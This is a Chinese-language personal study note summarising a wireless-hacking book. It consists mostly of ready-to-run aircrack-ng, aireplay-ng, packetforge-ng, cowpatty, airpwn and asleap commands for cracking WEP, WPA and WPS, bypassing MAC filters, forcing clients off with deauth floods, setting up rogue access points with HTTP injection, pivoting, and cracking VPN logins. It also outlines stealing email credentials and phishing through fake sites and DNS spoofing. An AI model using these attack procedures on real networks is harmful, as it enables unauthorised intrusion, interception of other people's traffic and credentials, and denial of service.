虽然无线破解早就烂大街了，还是去图书馆把这本书补上了，做个笔记，以供以后参考，记得很全面但很乱。测试环境为Kali linux 或backtrack

wep破解

1.将网卡激活成monitor模式

    airmon-ng start wlan0 6
    
2.开始抓取无线数据包：

    airodump-ng -w ciw.cap --channel 6 mon0
    
3.为了加快IV（初始化向量）的获取，可以进行ArpRequest注入式攻击，可以有效提高抓包数量及破解速度:

    aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 wlan0    

    参数解释：

    * -3，指的是采取ArpRequest注入攻击方式；
    * -b，后面跟上要入侵的AP的MAC地址；
    * -h，建议使用，效果会更好，后面跟的是监测到的客户端MAC地址；
    * -x num，指的是定义每秒发送数据包数量，这个num值可以根据实际情况调小一些，但一般来说最高1024就可以

4.开启aircrack-ng来进行同步破解：

    aircrack-ng -x -f 2 ciw.cap

    参数解释：
    * -x，是暴力破解模式；
    * -f，指启用密码复杂度为2；
    
    
1.启动无线网卡的监听模式
$ sudo airmon-ng start wlan0

2.  查看有哪些采用wep加密的路由器，记录目标ap的mac
$ sudo airodump-ng mon0

3. 另开一个终端,运行
$ sudo airodump-ng -c 6 --bssid AP’s MAC -w wep mon0
其中6是AP的信道（channel），AP’sMAC是路由器的MAC地址，wep的是抓下来的数据包保存的文件名

4. 再另开一个终端，与AP建立虚拟连接
$ sudo aireplay-ng -1 0 -a AP’s MAC -h My-MAC mon0

5. 建立虚拟连接成功后,运行下面命令，加速数据获取
$ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My-MAC mon0

6. 收集5000个以上的DATA之后，开始进行解密 。另开一个终端，运行
$ sudo aircrack-ng wep*.cap
如果暂时没算出来的话，继续等，aircrack-ng 会在DATA每增加5000个之后自动再次运行，直到算出密码为止

7. 破解成功后，关闭监控模式
$ sudo airmon-ng stop mon0

自动攻击工具：wep spoonfeeder

Deauth验证攻击，这个对于采用WPA验证的AP攻击都会用到，可以迫使AP重新与客户端进行握手验证，从而使得截获成为可能。命令如下
aireplay-ng  -0  10  -a   AP's MAC   mon0
或者
aireplay-ng  -0  10  -a   AP's MAC   -h  Client's MAC   mon0
    -0指的是采取Deautenticate攻击方式，后面为发送次数，-a后面跟上要入侵的AP的MAC地址，-h建议还是使用，效果会更好，这个后面跟的是监测到的客户端MAC地址

wep破解的多米诺骨牌

1.无客户端chopchop攻击
     1.airodump-ng --ivs -c 6 -w file mon0     捕获数据
     2.aireplay-ng -l  0  -e AP'ESSID -a AP'MAC -h CLIENT'MAC mon0
        FakeAuth:与ap建立虚拟的验证连接，以便之后注入数据包
        -h 用于攻击的网卡mac
     3.aireplay-ng -4 -b AP'MAC -h CLIENT'MAC mon0
        -4 chopchop攻击,生成密钥数据流文件  -h 攻击者自己的mac
        生成明文后缀为cap和密钥数据流后缀xor文件
     4.tcpdump  -s  0  -n  -e  -r  replay_dec.cap
        -s 从每个报文截取snaplen字节的数据
        -n 不进行ip地址到主机名的转换
        -e 在输出行打印数据链路层头部信息
        -r 从文件读取包
     5.packetforge-ng -0 -a AP'MAC -h CLIENT'MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment xor file -w writetofile
        -0  创建一个arp包
        -k ip目标ip及端口
        -l ip 来源ip及端口
        -y file，从文件读取prga数据
        -w file  将生成的数据报文写入cap文件
    6.aireplay-ng  -2  -r  writetofile  mon0
        为加快iv（初始化向量）获取，进行Interactive Attack及交互式攻击，将构造的数据包发送至目标ap
    7.aircrack-ng   chop*ivs
        破解密码

2.无客户端Fragment攻击
    1.捕获
    2.FakeAuth，虚假验证，监听界面会出现伪造的客户端
    3.aireplay-ng  -5  -b  AP'MAC  -h  CLIENT'MAC  mon0
        -5  fragment攻击，生成可用密钥数据流文件
        -h  攻击者自己的网卡mac
    4.packetforge-ng 构造注入数据包
    5.文件生成后，同时进行InteractiveAttack攻击，在airodump下可看到数据飞涨
    6.aircrack


3.无客户端ARP+Deauth攻击
    1.airodump-ng  -w  file  --channel  6  mon0
    2.aireplay-ng  -l  0  -e AP'ESSID -a  AP'MAC  -a  FakeMac mon0
         fakeauth攻击
    3.aireplay-ng  -l  6000   -o  1  -q  10  -e  AP'ESSID  -a  AP'MAC  -h  ATTK'MAC
        保证伪造客户端在线
        -l delay  延迟数量
        -o  每次发送数据包数量
        -q sec  发送keep-alives数据包时间间隔
        -e 目标ssid    
    4.aireplay-ng  -3  -b  AP'MAC   -h  CLIENT'MAC  mon0
        -3  同时进行arp注入攻击

    5.aircrack-ng  -n  152  file
        152为wep破解

共享密钥的wep破解
1.监听模式
2.抓包，若客户端没有活动，则deauth攻击，aireplay-ng  -0  1  -a  AP'MAC  mon0
    可看到CIPHER栏出现ska标识，右上角出现keystream提示
    生成三个文件a.mac.xor, a.cap,  a.txt.  xor文件为包含预共享密钥的文件
3.fakeauth攻击。
    aireplay-ng  -1  0  -e AP'ESSID -y a.xor  -a  AP'MAC  -h FAKEMAC  mon0
    -1 ,fakeauth模式
    -h，客户端mac或伪造mac
4.可同时进行ArpRequest注入攻击，进行完fakeauth攻击后，此时aireplay监听界面截获的ARP request数据为0，可再次进行deauth攻击使其重连。
5.aircrack-ng  filename

关闭ssid广播的对策

1，抓包分析
2，暴力破解
3，deauth攻击
    1.airodump探测，关闭ssid的ap只显示ssid的长度
    2.deauth使其重连
    3，监听界面出现ssid

突破mac地址过滤

1.获取合法客户端mac地址，airodump、omnipeek、kismet
2.更改mac地址伪造身份。win下用smac，linux下ifconfig wlan0  hw ether MAC    或  athmacchange.sh
3.重新装载网卡，连接ap

数据分析

1.查看ap品牌
2.查看对方访问网站，观察目标习惯，深入攻击
3.截获邮箱等账户密码

 

破解wpa

一、传统wpa-psk破解
1、2、3.激活网卡，设为monitor模式，捕获数据
4.aireplay-ng  -0 1 -a AP'MAC -c CLIENT'MAC wlan0? Deauth攻击获取wpa握手报文
5.aircrack-ng -w dic filename.cap 破解密码

Deauth数据包将以连接至无线路由器的合法无线客户端强制断开，客户端重连，便可以捕获握手包。
 -0 之后跟上攻击次数，可根据情况5～10不等；
如果成功，在airodump-ng界面右上角可以看到“wpa handshake"的提示。
-w 后跟字典名。


二、wpa pmk hash破解
内存-时间平衡。 彩虹表。wpa rainbow tables. wpa pmk hash tables.



关于aircrack-ng
 
主要组件
aircrack-ng 自动检测数据包，恢复密码
airmon-ng 改变无线网卡模式
aiodump-ng 捕获802.11数据
aireplay-ng 创建特殊的数据报文及流量
airserv-ng 将无线网卡连接至某一特定端口
airolib-ng 进行wpa rainbow table攻击时使用，用于建立特定数据库文件
airdecap-ng 解开处于加密状态的数据包
airdriver-ng 显示支持的网卡
airdecloak-ng 过滤出指定的数据
packetforge-ng 为注入攻击制作特殊加密报文，主要用于无客户端破解攻击
wesside-ng 自动wep破解工具，加入fragmentation攻击
tkiptun-ng 针对wpa tkip加密且启用qos的网络

（A） airdecap-ng

airdecap-ng -l -e AP'essid -p AP'password filename.cap
-l 不移除802.11 header部分，防止加密后的文件不可读
对于wep包
airdecap-ng -w AP'password filename.cap
-w 后跟wep十六进制密码

解密后可用wireshark分析

（B）ivstools
合并ivs文件：
ivstools --merge 1.ivs 2.ivs 3.ivs out.ivs
转换cap问ivs
ivstools --convert test.cap test.ivs

(C)airdrive-ng
airdrive-ng supported        查看支持芯片
airdrive-ng detail 序号        详细
airdrive-ng installed        已安装驱动

（D）airdecloak-ng
airdecloak-ng --bssid AP'MAC --filters signal -i 无线报文filename.cap
--filters 过滤选项，跟具体参数
完成后，会保存为后缀名为filtered的pcap文件。


关于wesside-ng
自动破解wep的工具.找出当前连接该无线网络的其他客户端mac，进行身份欺骗，使用类似fragmentation攻击方式，拦截广播及转发数据包，发现prga数据包。注入arp数据报，调用aircrack-ng PTW破解密码。
1.ifconfig wlan0 up
2.airmon-ng start wlan0
3.airodump-ng mon0
4.wesside-ng -v AP'MAC -k 1 -i mon0
    -k 重传次数，跟具体数值
捕获数据包保存在wep.cap的文件，可用aircrack-ng对该文件再次破解。

关于tkiptun-ng. 破解wpa
可以解开tkip加密了的数据包，并不是算出密钥。
1.安装
2.激活无线网卡，设为监听模式
3.tkiptun-ng -a AP'MAC -h CLIENT'MAC mon0 或
   tkiptun-ng -a AP'MAC -h CLIENT'MAC -m 80 -n 100 mon0
    -m 最小包长度
    -n  最大包长度

wps破解wpa／wpa2的捷径
1.将网卡设为监听模式
2../wpscan.py -i mon0        扫描开启wps功能的无线设备
3../wpspy.py -i mon0 -e AP'SSID     监测wps状态，是否为已配置
4.打开无线网卡自带配置工具，pin码连接，使用星号查看器查看密码
csrf攻击

现在也可以用reaver跑pin码

关于GPU破解
CUDA    
1.获取wpa-psk握手数据包，工具（airodump-ng，omnipeek，commview for wifi，airdefense）
2.打开ewsa，cpu、gpu、dictionary设置
3.import tcpdump file导入握手包，cap、pcap、dmp等
4.开始破解
5.未注册版本只显示两位密码，用winhex查看内存。“工具”--“打开ram内存”--找到ewsa的进程，--“find text“，输入破解的前两位密码，编码模式为”ascii／code“

关于分布式破解
free rainbow tables项目、ZerOne团队分布破解项目

cowpatty破解wpa

1.分析抓获的wpa握手包数据
2.cowpatty  -f  passd.txt  -r  wpa.cap  -s  AP'ESSID  -v
    -f,后跟字典
    -r,抓包文件

table破解

1.genpmk  -f  wordlist1.txt  -d  tablename  -s  AP'ESSID
    -f 字典
    -d 生成的table文件名
2.cowpatty  -d  tablename  -r  a.cap  -s  AP'ESSID

1.airolib-ng  test  init
    test 要建立的数据库
    init 建立数据库的命令
2.airolib-ng  test  import   cowpatty  tablename
    导入预运算tables
3.airolib-ng  database  stats
    查看数据库状态
4.aircrack-ng  -r  test  capturefile

 

无线欺骗攻击

伪造ap
1基于硬件的伪造ap。 刷新无线路由firmware，dd-wrt ,openwrt, AirSnarf
2.基于软件的伪造ap
    fakeAP
    fakeap.pl --interface 网卡名 --channel 频道 --essid AP'SSID --mac AP'MAC
    --essid zunzhe008 --interface wlan0    
    如不必需，可省略mac

    airbase-ng
    基于上软件的自动化脚本mitmap.sh
    ./mitmap.sh -m ap -i wlan0 -o eth0 -s AP'SSID
    -m 跟四种模式之一
    -o 跟有线网卡名，一定要先配置完毕，确保能连接外网
    -s 伪造ap的ssid，一般和预伪造目标一致
    会将捕获数据保存在当前目录.cap文件

    airpwn
    下载解压 tar zxvf airpwn
    cd airpwn
    tar zxvf lorcon-current.tgz
    cd lorcon
    configure&&make&&make install
    cd ..   &&  configure  &&  make
    (libpcre库）
    缺少文件：cp /usr/local/lib/liborcon-1.0.0.so /usr/lib
    破解网络之后进行欺骗
    注入配置文件：在airpwn主目录下
    conf目录下，编写名为zerone.html的文件
    内容：        
        begin zerone_html
        match  ^(GET|POST)
        ignore  ^GET [^ ?]+\.(jpg|jepg|gif|png|tif|tiff)
        response content/zerone_html
        只要出现GET或POST请求报文，就将其中网址替换成content目录下的zerone_html
    content目录下编写zerone_html文件
        HTTP/1.1 200 OK
        Connection: close
        Content-type: text/html

        <html><head><title>hack you!!1</title></head>
                <body><img src='http://xxxxxxx' width='100%' height='100%'>
                </head><body onLoad="alert();">

    攻击前注意airpwn支持的网卡
    airpwn -c conf/zerone_html -i rausb0 -d rt73 -vvv -F -k WEP
    -c 制定配置文件
    -d 跟支持的无线网卡驱动名称
    -F 假设设置为监听模式的网卡中没有FCS values？
    -k wep的16进制密码
    连接请求网址验证效果

搜索发现伪造ap：
    namp  -vv -sS 192.168.1.0/24  -p 80
        -sS 采用SYN扫描，在有防火墙时常用
    nmap -vv -sV  192.168.1.1 -p 80
        -sV 具体版本识别，对端口服务信息探测时使用
    收敛法向量法定位ap
MITM:
    Monkey-jack

无线跳板攻击
    airserv-ng
    1.在跳板机1上安装airserv-ng，将网卡设置为提供无线网卡远程访问的服务器
    airserv-ng -d 网卡  -p 端口     其他计算机只要连接到这个端口就可以使用此网卡
    2.配置端口重定向工具
    fpipe -l port -r port IP
    -l 监听本地某个端口
    -r 转发至某个端口，可以是本机
    其他跳板也是如此，一般各跳板端口不同，减少暴露
     3，远程攻击
    airodump-ng IP:port
    常见错误：address already in use，由已开启airserv-ng网络网卡服务并用默认666端口所致，修改端口或停止相应airserv


icmp协议隧道
    loki
http协议隧道
    GNU HTTPTunnel, HTTP Tunnel


伪造站点+dns欺骗
1.伪造站点
2.dns欺骗
3.查看效果，ping域名，显示内网ip

伪造电子邮件+伪造站点
1.截获邮箱帐号
2.建立伪造站点
3.受害者收到伪造电子邮件，包含域名相似的伪造站点
   

无线DOS攻击

关联及认证状态：
state1.未通过验证，未建立关联
state2.通过验证，未建立关联
state3.通过验证，建立关联

Access Point Overload , 无线接入点过载攻击
--只要客户端关联表达到饱和程度，接入点就会开始拒绝新的关联请求，这种状态为接入点过载。


Authentication Flood , 身份验证洪水攻击
--大量伪造的身份验证请求超过所能承受的能力时，ap将断开其他无线服务连接。


Authentication Failure , 身份验证失败攻击
--注入无效身份验证请求帧，使ap与客户端的连接中断

Deauthentication Flood , 取消身份验证洪水攻击、验证阻断洪水攻击
--伪造deauthentication帧，注入，踢出合法客户端
    
Association Flood ,  关联洪水攻击、关联淹没攻击
--对于开放身份验证。伪造关联，填充连接状态表。攻击工作在链路层

Disassociation Flood , 取消关联洪水攻击
--取消关联广播多用于配合中间人攻击，而这个常用于目标确定的p2p dos

Duration Attack , 持续时间攻击
--发送占用巨大持续时间值的帧，使其他节点等待

Wireless Adapter Driver Buffer Overflow, 无线网卡驱动溢出攻击
1.网卡漏洞检测工具
    WiFi DEnum
2.网络资源，WVE，AusCERT，Milw0rm.com
3.攻击实现工具
    metasploit framework

RF Jamming, 射频干扰攻击
--全频道阻塞、瞄准式阻塞

无线vpn破解

1.扫描vpn设备
    namp、zenmap
2.截获vpn交互数据包
    中间人攻击，ettercap、cain
3.破解
    asleap：用于pptp/leap密码恢复
    genkeys：将普通字典装换成asleap可识别的dat和idx专用hash文件
    genkeys  -r  dict  -f  simple.dat   -n  simple.idx
        -r 事先准备的字典
        -f 预制作的dat格式hash文件
        -n 预制作的idx格式hash文件
    asleap -r shark -f  simple.dat  -n simple.idx
        -r 截获的vpn客户端登录数据包


1.IPSecScan扫描启用ipsec的设备
    ipsecscan  ip
2.确认vpn设备
    ike-scan  --sport=0  -M ip
        --sport=<port> 设置udp源端口，默认500，随机端口为0.
        -M 将结果逐行显示
        --showbackoff  vpn指纹识别
    ike-scan  --sport=0  --showbackoff  -M ip 探测vpn操作系统或设备版本
3.基于截获数据cain破解